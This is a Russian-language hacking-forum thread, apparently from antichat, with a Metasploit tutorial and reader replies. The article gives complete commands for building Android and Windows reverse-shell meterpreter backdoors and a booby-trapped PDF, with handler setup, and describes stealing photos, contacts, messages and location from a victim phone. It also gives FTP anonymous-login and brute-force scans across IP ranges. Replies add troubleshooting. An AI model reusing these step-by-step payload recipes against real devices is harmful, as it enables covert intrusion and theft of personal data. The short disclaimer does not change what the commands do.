![]() |
Введение
Рад приветствовать дорогих читателей! Я практически уверен, что все, кто читает данную статью, как минимум слышали про такой замечательный фреймворк как Metasploit. Данный фреймворк хранит в себе довольно богатую базу данных различных уязвимостей на любой вкус и цвет, которые только возможно проэксплуатировать. В этой статье хочу познакомить вас с некоторыми полезными и даже можно выразиться базовыми уязвимостями, которые здорово помогут вам в изучении сферы информационной безопасности и естественно в саморазвитии. Цитата:
Итак, конечно же все действия будут проводиться на моей любимой Kali Linux, тем более там этот фреймворк уже предустановлен, поэтому если что, можно сразу к командам приступать и не париться. Бэкдор на андроид Здесь мы будем генерировать полезную нагрузку на андроид устройствах, делается всё довольно просто. Мы вписываем вот такую команду для генерации: Код:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test.apk
После того как мы его запустили, нам нужно выбрать нашу полезную нагрузку, а для этого вписываем последовательно следующие команды: Код:
use exploit/multi/handlerКод:
set payload android/meterpreter/reverse_tcpКод:
set lhost 192.168.0.9Код:
set lport 4444Код:
exploithttps://forum.antichat.xyz/attachmen...6302650481.png Ну теперь я устанавливаю и открываю файл полезной нагрузки, и на экране моментально получаю сессию к моему устройству. Спектр возможностей удалённого доступа здесь весьма обширный. Можно сделать фотку через любую из камер телефона, лазить по директориям и скачивать какие-либо файлы, делать полный дамп номеров в телефонной книге, сообщений и звонков, узнать местоположение и многое многое другое. Бэкдор на Windows. Ну здесь всё происходит впринципе аналогичным образом, нужно будет поменять лишь несколько строчек. Код:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test2.exeНу и далее так же по очереди запускаем следующие команды Код: Код:
use exploit/mulit/handlerДалее аналогичным образом проверяем всё это дело на Windows по средством запуска и сессия готова. Эксплоит в PDF Так же для фреймворка не составит труда сгенерировать PDF файл с полезной нагрузкой и аналогичным образом подключиться к нему. Давайте же приступим! Здесь уже msfvenom нам не понадобиться, будем всё делать прямиком в метасплоите, поэтому снова его запускаем msfconsole. Далее прописываем вот такие команды: Код: Код:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojsКод: Код:
set lhost 192.168.0.9Код: Код:
exploitНу и далее генерируется полезная нагрузка в виде файла PDF. Подключиться можно будет так же через multi/handler. То есть просто не выходя из консоли прописываем: Код: Код:
use exploit/multi/handlerВход по ftp Так же наш фреймворк может спокойно просканировать диапазон IP адресов на возможность подключения к какому-либо с помощью ftp через логин Anonymous Для этого мы запускаем наш фреймворк msfconsole. И вводим следующие команды: Код: Код:
use auxiliary/scanner/ftp/anonymousКод: Код:
set RHOSTS 192.168.1.200-254Код: Код:
set THREADS 55https://forum.antichat.xyz/attachmen...6302705781.png Таким же образом можно и подбирать логин с паролем к диапазону адресов, для этого вводим следующие команды: Код: Код:
set RHOSTS 192.168.69.50-254Ну и далее мы увидим адреса на которых есть ftp и к которым можно подключиться используя заданные вами логин и пароль для подбора. Заключение Сегодня поведал вам немного о такой волшебной и удивительной штуке как Metasploit Framework. И у него весьма широкий спектр применений, через него можно выполнять практически все ключевые задачи в тестировании чего-либо на уязвимость, но опять же повторюсь, что данная статья не побуждает к злонамеренным действиям и несёт лишь ознакомительный характер. |
Красава кхм кхм кхм дядюшка Рик одобряет
|
Добрый день, я так скажем начинающий ИБ, которому нравится вся эта движуха
Подскажите пожалуйста, я уже пользовался msfvenom и такой вопрос. Для чего использовать ключ (флаг) R > если существует ключ(флаг) -o которая позволяет также полезную нагрузку пихать в создаваемый файл? Можете пожалуйста немного рассказать в чём разница данных флагов? Спасибо. |
Цитата:
|
Цитата:
Спасибо. С уважением, Евгений. |
Замени use exploit/mulit/handler на use exploit/multi/handler и не позорься, а так статья норм
|
Цитата:
|
Приветствую! Ситуация следующая, создаю пейлоад по шагам выше, загружаю на свой телефон - выдает ошибку "Это приложение было создано для более ранней версии Android". Сессия не создается. Подскажите пожалуйста, как исправить?
Тестировал на 11 андройде, создавал на Kali (VB). Kali обновлял |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Подскажите пожалуйста вопрос, а речь ведь идет о Metasploit Framework или Metasploit Pro, почитал что только в коммерческой все работает,
ну и сам попробовал, по инструкции пишет Handler failed to bind to ip.ip.ip.ip:4321, так же не совсем понял какой порт нужно вписывать, просветите кто вкурсе? Спасибо! |
Цитата:
|
| Время: 23:57 |